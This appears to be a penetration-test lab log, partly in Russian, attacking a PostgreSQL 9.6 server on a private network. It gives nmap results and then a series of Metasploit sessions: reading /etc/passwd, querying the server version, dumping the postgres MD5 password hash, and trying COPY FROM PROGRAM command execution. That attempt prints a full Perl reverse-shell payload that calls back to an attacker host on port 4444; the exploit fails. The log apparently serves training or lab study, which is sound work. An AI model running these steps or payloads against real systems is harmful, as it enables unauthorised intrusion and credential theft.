Сканирование nmap

 192.168.0.0/24
192.168.0.10 kali
192.168.0.11 ubunta, РїРѕРґРЅСЏС‚ docker, ports:
5432tcp open  postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.19 
8080/tcp open  http       aiohttp 3.5.3 (Python 3.7)
|_http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Python/3.7 aiohttp/3.5.3
6379/tcp closed redis



Attack postgresql 
1.

msf6 auxiliary(admin/postgres/postgres_readfile) > set RHOSTS 192.168.0.11
RHOSTS => 192.168.0.11
msf6 auxiliary(admin/postgres/postgres_readfile) > set rfile /etc/passwd
rfile => /etc/passwd
msf6 auxiliary(admin/postgres/postgres_readfile) > run
[*] Running module against 192.168.0.11

Query Text: 'CREATE TEMP TABLE RGdAeAmJuPCLMc (INPUT TEXT);
      COPY RGdAeAmJuPCLMc FROM '/etc/passwd';
      SELECT * FROM RGdAeAmJuPCLMc'
=============================================================================================================================================

    input
    -----
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
    bin:x:1:1:bin:/bin:/sbin/nologin
    cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
    cyrus:x:85:12::/usr/cyrus:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    ftp:x:21:21::/var/lib/ftp:/sbin/nologin
    games:x:35:35:games:/usr/games:/sbin/nologin
    guest:x:405:100:guest:/dev/null:/sbin/nologin
    halt:x:7:0:halt:/sbin:/sbin/halt
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    man:x:13:15:man:/usr/man:/sbin/nologin
    news:x:9:13:news:/usr/lib/news:/sbin/nologin
    nobody:x:65534:65534:nobody:/:/sbin/nologin
    ntp:x:123:123:NTP:/var/empty:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    postgres:x:70:70::/var/lib/postgresql:/bin/sh
    postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
    root:x:0:0:root:/root:/bin/ash
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
    squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
    sshd:x:22:22:sshd:/dev/null:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
    vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
    xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
[+] 192.168.0.11:5432 Postgres - /etc/passwd saved in /home/kali/.msf4/loot/20230714102712_default_192.168.0.11_postgres.file_282366.txt
[*] Auxiliary module execution completed


2.

msf6 auxiliary(admin/postgres/postgres_sql) > set rhosts 192.168.0.11
rhosts => 192.168.0.11
msf6 auxiliary(admin/postgres/postgres_sql) > run
[*] Running module against 192.168.0.11

Query Text: 'select version()'
==============================

    version
    -------
    PostgreSQL 9.6.15 on x86_64-pc-linux-musl, compiled by gcc (Alpine 8.3.
    0) 8.3.0, 64-bit

[*] Auxiliary module execution completed

3.

msf6 auxiliary(scanner/postgres/postgres_hashdump) > set rhosts 192.168.0.11
rhosts => 192.168.0.11
msf6 auxiliary(scanner/postgres/postgres_hashdump) > run

[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================

 Username  Hash
 --------  ----
 postgres  md5e8a48653851e28c69d0506508fb27fc5

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


4. Попытка исполнения произвольного кода 
Pwn Postgres Shell

Установки под управлением Postgres 9.3 и выше имеют особую функциональность, которая позволяет суперпользователю и пользователям с «pg_execute_server_program» передавать данные во внешнюю программу и из нее с помощью COPY. Это, в свою очередь, дает возможность выполнять произвольные команды, как если бы у человека был консольный доступ. Этот модуль пытается создать новую таблицу, а затем выполнить системные команды в контексте копирования выходных данных команды в нее.

sf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set rhosts 192.168.0.11
rhosts => 192.168.0.11
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set lhost 192.168.0.10
lhost => 192.168.0.10
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set username postgres
username => postgres
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.0.10:4444 
[*] 192.168.0.11:5432 - 192.168.0.11:5432 - PostgreSQL 9.6.15 on x86_64-pc-linux-musl, compiled by gcc (Alpine 8.3.0) 8.3.0, 64-bit
[*] 192.168.0.11:5432 - Exploiting...
[+] 192.168.0.11:5432 - 192.168.0.11:5432 - lLWHQQ5uG1l dropped successfully
[+] 192.168.0.11:5432 - 192.168.0.11:5432 - lLWHQQ5uG1l created successfully
[!] 192.168.0.11:5432 - 192.168.0.11:5432 - Unable to execute query: COPY "lLWHQQ5uG1l" FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.10:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''';
[!] 192.168.0.11:5432 - 192.168.0.11:5432 - Unable to execute query: COPY "lLWHQQ5uG1l" FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.10:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''';
[-] 192.168.0.11:5432 - Exploit Failed
[*] Exploit completed, but no session was created.
















